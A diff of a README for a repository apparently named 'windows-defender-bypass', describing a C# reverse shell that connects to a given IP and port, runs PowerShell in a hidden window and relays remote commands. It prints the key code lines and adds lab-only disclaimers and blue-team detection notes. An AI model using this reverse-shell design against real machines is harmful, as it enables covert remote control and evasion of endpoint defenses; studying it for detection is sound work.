muhmad-umair/windows-defender-bypass/README.md

 ▶️ Runtime Parameters
 The program expects two arguments:

-php-template
+bash
 Copy code
 RShell.exe <ip> <port>
-<ip>: Destination IP (string)
+<ip> : Destination IP (string)

-<port>: Destination port (integer)
+<port> : Destination port (integer)

-Note: This is for lab use only in environments you own/control and are authorized to test.
+⚠️ Note: This is for lab use only in environments you own/control and are authorized to test.
 Do not point this at networks or hosts without written consent.

 🔍 Code Walkthrough
 Key elements in Program.cs:

+Networking:

+csharp
+Copy code
-Networking: TcpClient client = new TcpClient(); client.Connect(ip, port);
+TcpClient client = new TcpClient();
+client.Connect(ip, port);
+Streams:

-Streams: Wraps the network stream with StreamReader/StreamWriter for line-oriented I/O.
+Wraps the network stream with StreamReader/StreamWriter for line-oriented I/O.

+Process:
-Process: Launches PowerShell via ProcessStartInfo with:
+Launches PowerShell via ProcessStartInfo with:

+csharp
+Copy code
+p.StartInfo.UseShellExecute = false;
+p.StartInfo.RedirectStandardInput = true;
+p.StartInfo.RedirectStandardOutput = true;
+p.StartInfo.RedirectStandardError = true;
-UseShellExecute = false
+p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;

-Redirection for StandardInput, StandardOutput, StandardError

-Hidden window (ProcessWindowStyle.Hidden)
+Event Handlers:

-Event Handlers: Subscribes to OutputDataReceived / ErrorDataReceived to forward output lines back over the socket.
+Subscribes to OutputDataReceived / ErrorDataReceived to forward output lines back over the socket.

+Loop:
-Loop: Reads remote lines and writes to p.StandardInput until exit.
+Reads remote lines and writes them to:

-Consider adding robust error handling, logging to a local file (in lab), and graceful shutdown behavior for educational completeness.
+csharp
+Copy code
+p.StandardInput.WriteLine(userInput);
 🧪 Safe Lab & Testing Guidance (High-Level)
 To keep this ethical and safe:

 Isolate your lab.
 Use local VMs or containers on a closed network with no internet egress.
-Snapshots help you revert quickly.

 Document consent.
 If collaborating, get written permission (scope, dates, systems, data handling).

 Least privilege.
 Use non-admin test accounts and non-production systems/data.

 Observe & learn.
-Pair your runs with monitoring (process creation logs, PowerShell logging, network telemetry) to understand blue-team visibility.
+Pair runs with monitoring (process creation logs, PowerShell logging, network telemetry).

-No operationalization here.
+No operationalization.
 This README does not include listener setup or exploitation steps.
-If you don’t already know how to safely simulate endpoints in a closed lab, focus on the code and defensive detections first.

 🛡️ Blue-Team Notes (Defensive Study)
 When running in a lab, explore how the following controls observe activity:

-PowerShell Logging: Script Block, Module, and Transcription logging.
+PowerShell Logging: Script Block, Module, and Transcription logging

-AMSI (Antimalware Scan Interface): Scans PowerShell content before execution.
+AMSI (Antimalware Scan Interface): Scans PowerShell content before execution

-Process Creation Events: E.g., Windows Event ID 4688 / Sysmon Event ID 1.
+Process Creation Events: Windows Event ID 4688 / Sysmon Event ID 1

-Network Telemetry: Egress connections, unusual destinations/ports.
+Network Telemetry: Egress connections, unusual destinations/ports

-Command-line Auditing: Visibility into -ExecutionPolicy Bypass usage.
+Command-line Auditing: Visibility into -ExecutionPolicy Bypass usage

 Questions to ask in your lab: